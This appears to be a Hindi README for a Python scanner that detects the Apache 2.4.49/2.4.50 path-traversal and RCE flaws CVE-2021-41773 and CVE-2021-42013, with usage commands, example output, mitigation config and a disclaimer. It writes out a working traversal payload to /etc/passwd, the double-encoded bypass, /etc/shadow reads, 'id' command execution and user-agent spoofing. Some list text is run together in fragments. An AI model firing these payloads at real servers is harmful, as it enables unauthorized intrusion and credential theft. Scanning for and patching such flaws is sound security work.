
CVE-2021-41773 और CVE-2021-42013 पथ-ट्रैवर्सल और रिमोट कोड निष्पादन कमजोरियों का पता लगाने के लिए Python-आधारित स्कैनर, जो Apache HTTP सर्वर 2.4.49 और 2.4.50 में मौजूद हैं।
CVE-2021-41773 और CVE-2021-42013 पथ ट्रैवर्सल और रिमोट कोड निष्पादन भेद्यताओं का पता लगाने के लिए Apache HTTP सर्वर संस्करण 2.4.49 और 2.4.50 में एक व्यापक Python-आधारित भेद्यता स्कैनर।
CVE-2021-41773 और CVE-2021-42013 Apache HTTP सर्वर को प्रभावित करने वाली महत्वपूर्ण भेद्यताएँ हैं जो हमलावरों को अनुमति देती हैं:
ये भेद्यताएँ अक्टूबर 2021 में व्यापक ध्यान आकर्षित कर गईं और जंगल में सक्रिय रूप से शोषण की गईं।
.%2e) को निर्देशिका प्रतिबंधों को बायपास करने की अनुमति देता है/etc/passwd जैसी संवेदनशील फ़ाइलें पढ़ना, mod_cgi सक्षम होने पर मनमाने आदेश निष्पादित करना%%32%65) बायपास की अनुमति देता है✅ दोहरी CVE पहचान: CVE-2021-41773 और CVE-2021-42013 दोनों के लिए परीक्षण ✅ पथ ट्रैवर्सल परीक्षण: फ़ाइल एक्सेस प्रयासों के लिए कई पेलोड विविधताएँ ✅ RCE परीक्षण: यदि mod_cgi सक्षम है तो रिमोट कोड निष्पादन सत्यापन ✅ बैच स्कैनिंग: फ़ाइल से कई लक्ष्यों को स्कैन करें ✅ रंग-कोडित आउटपुट: पढ़ने में आसान स्वरूपित परिणाम ✅ अनुकूलन योग्य टाइमआउट: अविश्वसनीय नेटवर्क के लिए समायोज्य अनुरोध टाइमआउट ✅ यूजर-एजेंट स्पूफिंग: बुनियादी फ़िल्टरिंग तंत्र को बायपास करता है
requests लाइब्रेरीcolorama लाइब्रेरीhttps://github.com/drackyjr/CVE-2021-42013.git
cd cve-2021-41773-42013
pip3 install -r requirements.txt
या मैन्युअल रूप से स्थापित करें:
pip3 install requests colorama
python3 cve_scanner.py -u http://192.168.1.100
python3 cve_scanner.py -u https://target.com
python3 cve_scanner.py -u http://target.com -t 15
python3 cve_scanner.py -l targets.txt
python3 cve_scanner.py -h
| तर्क | संक्षिप्त | प्रकार | विवरण |
|---|---|---|---|
--url | -u | STRING | लक्ष्य URL (जैसे, http://example.com) |
--list | -l | FILE | लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक) |
--timeout | -t | INTEGER | सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10) |
python3 cve_scanner.py -u http://192.168.1.100
targets.txt बनाएँ:
http://192.168.1.100
https://example.com:8080
http://10.0.0.50
https://vulnerable.server.com
फिर चलाएँ:
python3 cve_scanner.py -l targets.txt -t 15
python3 cve_scanner.py -u http://target.com -t 30
स्कैनर विस्तृत आउटपुट प्रदान करता है जिसमें शामिल हैं:
उदाहरण आउटपुट:
============================================================
CVE-2021-41773 / CVE-2021-42013 भेद्यता स्कैनर
============================================================
[*] लक्ष्य: http://192.168.1.100
[*] CVE-2021-41773 (Apache 2.4.49) का परीक्षण...
[+] CVE-2021-41773 के लिए भेद्य!
[+] पेलोड: /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
[+] प्रतिक्रिया:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
============================================================
स्कैन सारांश
============================================================
[!] लक्ष्य भेद्य है!
[!] तत्काल पैचिंग आवश्यक!
[*] अनुशंसा: Apache HTTP सर्वर 2.4.51 या बाद में अपग्रेड करें
============================================================
.%2e) के साथ अनुरोध भेजता है/cgi-bin/, /icons/, /images//etc/passwd और /etc/shadow पढ़ने का प्रयास करता है%%32%65) के साथ अनुरोध भेजता हैid कमांड निष्पादित करता हैuid= और gid= की तलाश करता हैस्कैनर निम्नलिखित की तलाश करता है:
/etc/passwd से root: या daemon: प्रविष्टियाँ शामिल हैंid कमांड निष्पादन से uid= और gid= शामिल हैं<Directory />
Require all denied
</Directory>
# संवेदनशील निर्देशिकाओं तक पहुँच प्रतिबंधित करें
<Directory /cgi-bin>
Require all denied
</Directory>
# यदि आवश्यक न हो तो प्रतीकात्मक लिंक अक्षम करें
Options -FollowSymLinks
# सुरक्षा हेडर सक्षम करें
Header always set X-Content-Type-Options "nosniff"
Header always set X-Frame-Options "DENY"
# Apache संस्करण जांचें
apache2 -v
httpd -v
| संस्करण | स्थिति | कार्रवाई |
|---|---|---|
| 2.4.49 | ❌ भेद्य | तुरंत अपग्रेड करें |
| 2.4.50 | ⚠️ आंशिक रूप से पैच | 2.4.51+ पर अपग्रेड करें |
| 2.4.51+ | ✅ पैच | कोई कार्रवाई आवश्यक नहीं |
⚠️ महत्वपूर्ण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम (CFAA) और दुनिया भर में समान कानूनों के तहत अवैध है।
केवल अधिकृत उपयोग:
दुरुपयोग चेतावनी: उपयोगकर्ता यह सुनिश्चित करने के लिए जिम्मेदार हैं कि किसी भी लक्ष्य का परीक्षण करने से पहले उनके पास स्पष्ट प्राधिकरण हो। लेखक अनधिकृत उपयोग के लिए कोई दायित्व नहीं मानते हैं।
यह स्कैनर इसके लिए आदर्श है:
.
├── cve_scanner.py # मुख्य स्कैनर स्क्रिप्ट
├── requirements.txt # Python निर्भरताएँ
├── README.md # यह फ़ाइल
├── targets.txt # उदाहरण लक्ष्य सूची
└── LICENSE # लाइसेंस जानकारी
requests==2.28.1
colorama==0.4.5
http://192.168.1.100
https://vulnerable.example.com
http://10.0.0.50:8080
समाधान: -t विकल्प के साथ टाइमआउट बढ़ाएँ
python3 cve_scanner.py -u http://target.com -t 30
समाधान: स्क्रिप्ट डिफ़ॉल्ट रूप से SSL सत्यापन अक्षम करती है। यदि समस्याएँ बनी रहती हैं, तो सुनिश्चित करें कि Python प्रमाणपत्र अपडेट हैं:
pip3 install --upgrade certifi
समाधान: सुनिश्चित करें कि सभी निर्भरताएँ स्थापित हैं
pip3 install -r requirements.txt
समाधान: स्क्रिप्ट को निष्पादन योग्य बनाएँ
chmod +x cve_scanner.py
python3 cve_scanner.py -u http://target.com
-l का उपयोग करेंयोगदान का स्वागत है! योगदान देने के लिए:
git checkout -b feature/improvement)git commit -m 'Add improvement')git push origin feature/improvement)कृपया सुनिश्चित करें:
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है। विवरण के लिए LICENSE फ़ाइल देखें।
सुरक्षा परीक्षण उपकरण
शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए बनाया गया।
प्रश्नों, समस्याओं या सुझावों के लिए कृपया GitHub पर एक मुद्दा खोलें।
अंतिम अद्यतन: नवंबर 2025
स्थिति: सक्रिय विकास
परीक्षण किया गया: Python 3.8+, Apache 2.4.49, 2.4.50